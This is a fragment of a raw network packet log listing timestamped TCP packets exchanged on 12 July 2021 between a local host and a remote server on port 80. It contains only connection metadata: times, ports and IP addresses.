Jul 12, 2021 10:28:46.433931112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433944941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.433957100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.433979034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434001923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434030056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434076071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434633970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434667110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434705019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434734106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434770107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434792042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434813023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434822083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434844017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434853077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434879065 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434900045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434909105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434932947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434952974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434962034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.434986115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.434992075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435017109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435040951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435051918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435076952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435086966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435132980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435158968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435183048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435214043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435224056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435242891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435259104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435296059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435334921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435353994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435420990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435461998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435559988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435583115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435605049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435628891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435640097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435663939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435684919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435704947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435718060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435740948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435755968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435776949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435787916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435811996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435823917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435849905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435859919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435884953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435900927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435924053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435936928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435960054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.435971022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.435993910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436007023 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436029911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436048031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436079979 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436126947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436172009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436182022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436204910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436224937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436239958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436253071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436269999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436283112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436321020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436573982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436640978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436810017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436845064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.436870098 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436897993 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.436990976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437041044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437060118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437083006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437110901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437118053 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437140942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437153101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437165022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437191963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437203884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437228918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437254906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437263012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437289000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437297106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437319994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437330961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437345982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437367916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437376976 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437400103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437412024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437434912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437443018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437469006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437479973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437515020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437650919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437674999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437705040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437727928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437761068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437782049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437812090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437819004 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437835932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437850952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437860966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437886000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437896013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437922955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437932968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437957048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.437968969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.437992096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438003063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438025951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438039064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438060045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438071966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438101053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438110113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438137054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438148022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438174963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438194990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438219070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438227892 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438252926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438270092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438290119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438301086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438328028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438337088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438361883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438374043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438400984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438411951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438435078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438447952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438468933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438483000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438503981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438513994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438535929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438550949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438568115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438584089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438601971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438613892 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438636065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438649893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438673019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438683987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438709021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438718081 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438741922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438759089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438782930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438796043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438818932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438829899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438853979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438863039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438886881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438895941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438920975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438934088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438955069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.438966990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.438991070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439002037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439028978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439039946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439063072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439076900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439099073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439109087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439147949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439174891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439202070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439224958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439234018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439254999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439275026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439285994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439306021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439330101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439344883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439363003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439378977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439395905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439409971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439429045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439452887 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439466000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439481020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439505100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439516068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439539909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439553022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439582109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439606905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439630032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439654112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439662933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439688921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439694881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439713955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439724922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439742088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439753056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439766884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439786911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439796925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439819098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439827919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439855099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439865112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439888954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439897060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439919949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439932108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439950943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439963102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.439982891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.439992905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440013885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440026999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440042973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440056086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440073967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440087080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440103054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440115929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440134048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440144062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440164089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440177917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440195084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440207005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440228939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440237999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440262079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440274000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440295935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440304995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440330029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440341949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440365076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440378904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440404892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440413952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440439939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440454960 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440478086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440489054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440515041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440524101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440547943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440560102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440588951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440599918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440629005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440639973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440669060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440679073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440705061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440715075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440737963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440747976 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440773010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440785885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440807104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440817118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440839052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440855026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440871954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440887928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440902948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440913916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440934896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440947056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.440967083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.440979958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441003084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441011906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441036940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441047907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441070080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441082954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441104889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441113949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441139936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441149950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441174984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441184044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441207886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441216946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441241026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441266060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441276073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441296101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441313028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441334009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441349030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441363096 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441386938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441400051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.441426039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441447973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441473007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441494942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441515923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441538095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441560030 CEST	80	49720	47.254.186.176	192.168.2.3
